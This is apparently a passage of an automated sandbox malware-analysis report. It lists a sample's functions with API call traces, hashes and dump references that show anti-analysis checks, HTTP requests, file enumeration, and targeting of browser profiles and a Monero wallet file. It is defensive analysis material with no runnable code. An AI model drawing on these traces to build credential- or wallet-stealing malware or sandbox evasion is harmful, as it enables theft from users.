                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 0ade4c601c2f16b7aad7b718a51bcb29b6349352f58537a5cba433e622bb9ffa
                              • Instruction ID: 9585812e6be73a6690bdcbd11a595e2a7b8bb13c7702e72dfdbb9bb1de13f067
                              • Opcode Fuzzy Hash: 0ade4c601c2f16b7aad7b718a51bcb29b6349352f58537a5cba433e622bb9ffa
                              • Instruction Fuzzy Hash: E901FBB0A44308FAEB10DBE4DC49FAEBB78AB14706F208159FB05FA290D7B455858799
                              Function 00156AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 156af3 1451 156b0a 1450->1451 1453 156b0c-156b22 call 156920 call 155b10 CloseHandle ExitProcess 1451->1453 1454 156aba-156ad7 call 15aad0 OpenEventA 1451->1454 1460 156af5-156b04 CloseHandle Sleep 1454->1460 1461 156ad9-156af1 call 15aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00156AF9
                              • Sleep.KERNEL32(00001770), ref: 00156B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156B1A
                              • ExitProcess.KERNEL32 ref: 00156B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 96f4d64df53cf3da5fcdc55b91a49a192c9587e5422a2c04aa6d41fb8ec9717f
                              • Instruction ID: 84737e6ca417e6156c9a3b76e6c151071eb2b1e0a9091d4e6d61bc18a455df21
                              • Opcode Fuzzy Hash: 96f4d64df53cf3da5fcdc55b91a49a192c9587e5422a2c04aa6d41fb8ec9717f
                              • Instruction Fuzzy Hash: D9F03A70A40309EBF700ABA0DC0ABBD7A78EB14702F904555BD23AB1D1DBB05548D6E6
                              Function 001447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 687009bedf6cc9bc4f3229d7deee0873329f7fd868ccee541ea95674850ca00c
                              • Instruction ID: e44026be986828b5cf0575e0111120956876f561a93e62be7d44fcb0015f49c7
                              • Opcode Fuzzy Hash: 687009bedf6cc9bc4f3229d7deee0873329f7fd868ccee541ea95674850ca00c
                              • Instruction Fuzzy Hash: 8A213EB1D00209ABDF14DFA5EC45ADE7B75FF44320F508625F925AB291EB706A09CB81
                              Function 001551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 00146280: InternetOpenA.WININET(00160DFE,00000001,00000000,00000000,00000000), ref: 001462E1
                                • Part of subcall function 00146280: StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146303
                                • Part of subcall function 00146280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00146335
                                • Part of subcall function 00146280: HttpOpenRequestA.WININET(00000000,GET,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00146385
                                • Part of subcall function 00146280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001463BF
                                • Part of subcall function 00146280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001463D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: ac0c6a1d6ddb73a7c703be5e882c4a6758dbb933f4bd385054dfdd67fd755fad
                              • Instruction ID: 930dec45f5233f01d66e2814d7795e4a3004a76ce7048b366e3d5f1c49c06a72
                              • Opcode Fuzzy Hash: ac0c6a1d6ddb73a7c703be5e882c4a6758dbb933f4bd385054dfdd67fd755fad
                              • Instruction Fuzzy Hash: A7110D30940108E6CB14FF60DD52AED7738AF60301F804254FC2A4E192EF306B09C691
                              Function 001578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0015792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 12e49b95149a2dc5a7f08bd72c3de675db2aab9d6132bc5d2a340b438a048ae4
                              • Instruction ID: e38398d37cbb64421ac1963bfba6e34d5b83f03ba6d9be0d89c9ad88186d3ef7
                              • Opcode Fuzzy Hash: 12e49b95149a2dc5a7f08bd72c3de675db2aab9d6132bc5d2a340b438a048ae4
                              • Instruction Fuzzy Hash: 900162B1904604EBD714DF94DD45FAAFBBCF704B26F10425AEA55A7280C37459048BA1
                              Function 00141110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0014112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00141132
                              • ExitProcess.KERNEL32 ref: 00141143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: a885fbfd19389e4867fd04ee4a0af0b88ba7fc377cb57f74ca6ddd245b220123
                              • Instruction ID: 3acc3a58398f03f50c670c204fe8dc81e6cbde271524bd770044549743c67fef
                              • Opcode Fuzzy Hash: a885fbfd19389e4867fd04ee4a0af0b88ba7fc377cb57f74ca6ddd245b220123
                              • Instruction Fuzzy Hash: 1EE0E671985308FBF711ABA09C0AB097A7CAB04B41F104195F709771D0D7B52640979A
                              Function 001410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001410B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001410F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: e92aca30a4508f00c10babfbeb6966bba84c2eae38177588ea27c110f110dd50
                              • Instruction ID: f88eee3d28ff83d53d137eae6f22e2a94a35633245f7cf4f7c1e310824f5317a
                              • Opcode Fuzzy Hash: e92aca30a4508f00c10babfbeb6966bba84c2eae38177588ea27c110f110dd50
                              • Instruction Fuzzy Hash: 6CF0E271641308BBE7149AA4AC59FAAB7ECE705B15F300448F904E7290D6719E40DBA0
                              Function 00141190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157910
                                • Part of subcall function 001578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00157917
                                • Part of subcall function 001578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0015792F
                                • Part of subcall function 00157850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001411B7), ref: 00157880
                                • Part of subcall function 00157850: RtlAllocateHeap.NTDLL(00000000), ref: 00157887
                                • Part of subcall function 00157850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0015789F
                              • ExitProcess.KERNEL32 ref: 001411C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 71d653ece90246c3b6deecb0c7edcf03951bf9aa026bf6a2f3a7a1d094b5f838
                              • Instruction ID: a2f0e748f9f0bcf95cda07dc369720fb4423dc2495cc22a6cc205e33000d8dc4
                              • Opcode Fuzzy Hash: 71d653ece90246c3b6deecb0c7edcf03951bf9aa026bf6a2f3a7a1d094b5f838
                              • Instruction Fuzzy Hash: D2E012B5914301A7DE0073B1BC0BB2A329C5B24747F040865FE15D7152FF69E944866A

                              Non-executed Functions

                              Function 001538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001538CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001538E3
                              • lstrcat.KERNEL32(?,?), ref: 00153935
                              • StrCmpCA.SHLWAPI(?,00160F70), ref: 00153947
                              • StrCmpCA.SHLWAPI(?,00160F74), ref: 0015395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00153C67
                              • FindClose.KERNEL32(000000FF), ref: 00153C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 218f77c6bed745a5156d1160d7703cadb9eec9cb438a3e9d755465b1b455f16c
                              • Instruction ID: ef4d9bcffa1e0a094d3cd89554e5b9b5a9524cd2c7b9b7e96ea06f0d7bb45320
                              • Opcode Fuzzy Hash: 218f77c6bed745a5156d1160d7703cadb9eec9cb438a3e9d755465b1b455f16c
                              • Instruction Fuzzy Hash: EFA12FB1900218EBDB25DFA4DC85FEA737CBB58301F044589BA1D9B141EB759B88CF62
                              Function 0014BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00160B32,00160B2B,00000000,?,?,?,001613F4,00160B2A), ref: 0014BEF5
                              • StrCmpCA.SHLWAPI(?,001613F8), ref: 0014BF4D
                              • StrCmpCA.SHLWAPI(?,001613FC), ref: 0014BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0014C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: e9b26144bf7c9d7199f2c8bc01bc423ca0bfaaeb302b4e78fc6282d1337523c0
                              • Instruction ID: e3ae0fe95032fbeb3dab67582921acaef6df2dbfb45713c85a389a81fdc40406
                              • Opcode Fuzzy Hash: e9b26144bf7c9d7199f2c8bc01bc423ca0bfaaeb302b4e78fc6282d1337523c0
                              • Instruction Fuzzy Hash: 35426572950108EBDB14FBB0DC96EED733DAF64301F804658B9169A191EF349B4DCBA2
                              Function 00154910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0015492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00154943
                              • StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
                              • StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
                              • FindClose.KERNEL32(000000FF), ref: 00154B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
